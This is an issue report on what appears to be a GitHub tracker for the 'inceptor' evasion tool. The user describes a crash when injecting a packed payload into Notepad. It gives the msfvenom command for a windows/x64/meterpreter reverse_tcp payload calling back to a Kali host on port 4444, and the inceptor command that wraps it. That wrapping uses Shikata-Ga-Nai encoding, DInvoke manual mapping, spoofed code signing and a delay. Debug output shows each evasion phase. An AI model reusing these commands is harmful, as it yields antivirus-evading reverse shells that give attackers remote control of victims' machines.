Describe the bug
I use a command containing "-m dinvoke" to compile the packaged exe, which causes an exception when injecting into Notepad.
To Reproduce
My OS is Windows 10 and the VS version is VS2022.
I use msfvenom to create the raw payload in Kali, with the command below:
msfvenom --platform Windows -p windows/x64/meterpreter/reverse_tcp LHOST=kali ip LPORT=4444 -f raw > a4.raw
The inceptor bypass command is "python inceptor.py donet a4.raw -o demo\xx.exe --sgn --sign -P -m dinvoke --delay 15".
I use the command "demo.bat xx.exe" and the injected victim Notepad exits abnormally.
But if I remove the option -m dinvoke, then the final compiled exe can make the reverse connection to Kali successfully.
Or if I remove the option -P, then the final compiled exe can also make the reverse connection to Kali successfully.
Expected behavior
Run "demo.bat xx.exe" and the final compiled payload can make the reverse connection to Kali.
Debug Info:
Go to your config.ini file
In DEBUG, mark all as 1
Reproduce the bug again
Paste the output given by the tool
▒ by d3adc0de (@klezVirus)
--------------------------------------------------------------------------------------
[DEBUG] Loading module Dinvoke
[DEBUG] Loading module Delay
[+] .Net Artifact Generator Started At 2023-05-29 13:11:56.792864
[*] Phase 0: Loading...
[*] Phase 1: Converting binary into shellcode
[>] Transformer: Loader
[*] Phase 2: Encoding
[>] Phase 2.1: Using Shikata-Ga-Nai x64 to encode the shellcode
[*] Encoded filename: C:\Users\ll\inceptor\inceptor\temp\tmpjl1x2_0v.raw.sgn
[>] Phase 2.2: Using Inceptor chained encoder to encode the shellcode
[>] Encoder Chain: HexEncoder
[>] Shellcode size: 1228
[>] Shellcode Signature: 4cd095380d1813a5d7ce12309e1b7f282cb629cb
[*] Phase 3: Generating source files using CLASSIC-DINVOKE_MANUAL_MAPPING
[>] Phase 3.1: Writing CS file in .\temp\tmpxm7yrsms.cs
[>] Phase 3.2: Compiling and linking dependency files in "DInvoke.dll"
[*] Phase 4: Compiling
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /target:exe /platform:x64 /unsafe /out:"C:\Users\ll\inceptor\inceptor\temp\xx-temp.exe" /res:"C:\Users\ll\inceptor\inceptor\libs\public\DInvoke.dll" /r:"C:\Users\ll\inceptor\inceptor\libs\public\DInvoke.dll" "C:\Users\ll\inceptor\inceptor\temp\tmpxm7yrsms.cs"
Microsoft (R) Visual C# Compiler version 4.8.3752.0
for C# 5
Copyright (C) Microsoft Corporation. All rights reserved.
This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240
[*] Phase 5: Merging Resources
"C:\Users\ll\inceptor\inceptor\libs\public\ILRepack.exe" /target:exe /out:"C:\Users\ll\inceptor\inceptor\temp\xx-packed.exe" "C:\Users\ll\inceptor\inceptor\temp\xx-temp.exe" "C:\Users\ll\inceptor\inceptor\libs\public\DInvoke.dll"
INFO: IL Repack - Version 2.0.18
INFO: ------------- IL Repack Arguments -------------
/out:C:\Users\ll\inceptor\inceptor\temp\xx-packed.exe C:\Users\ll\inceptor\inceptor\temp\xx-temp.exe C:\Users\ll\inceptor\inceptor\libs\public\DInvoke.dll
-----------------------------------------------
INFO: Adding assembly for merge: C:\Users\ll\inceptor\inceptor\temp\xx-temp.exe
INFO: Adding assembly for merge: C:\Users\ll\inceptor\inceptor\libs\public\DInvoke.dll
INFO: Processing references
INFO: Processing types
INFO: Merging <Module>
INFO: Merging <Module>
INFO: Processing exported types
INFO: Processing resources
INFO: Fixing references
INFO: Writing output assembly to disk
INFO: Finished in 00:00:00.6446447
[+] Success: packed file stored at C:\Users\ll\inceptor\inceptor\temp\xx-temp.exe
[+] File Signature: cadf3da2d2cc537444b9b57d5081116a2981d290
[*] Phase 6: Sign dotnet binary
'"C:\Users\ll\inceptor\inceptor"' 不是内部或外部命令,也不是可运行的程序
或批处理文件。
[+] Signed with: CarbonCopy
[*] Phase 7: Finalising
[+] Success: file stored at demo\xx.exe
[*] Phase 8: Cleaning up
[+] .Net Artifact Generator Finished At 2023-05-29 13:12:00.463994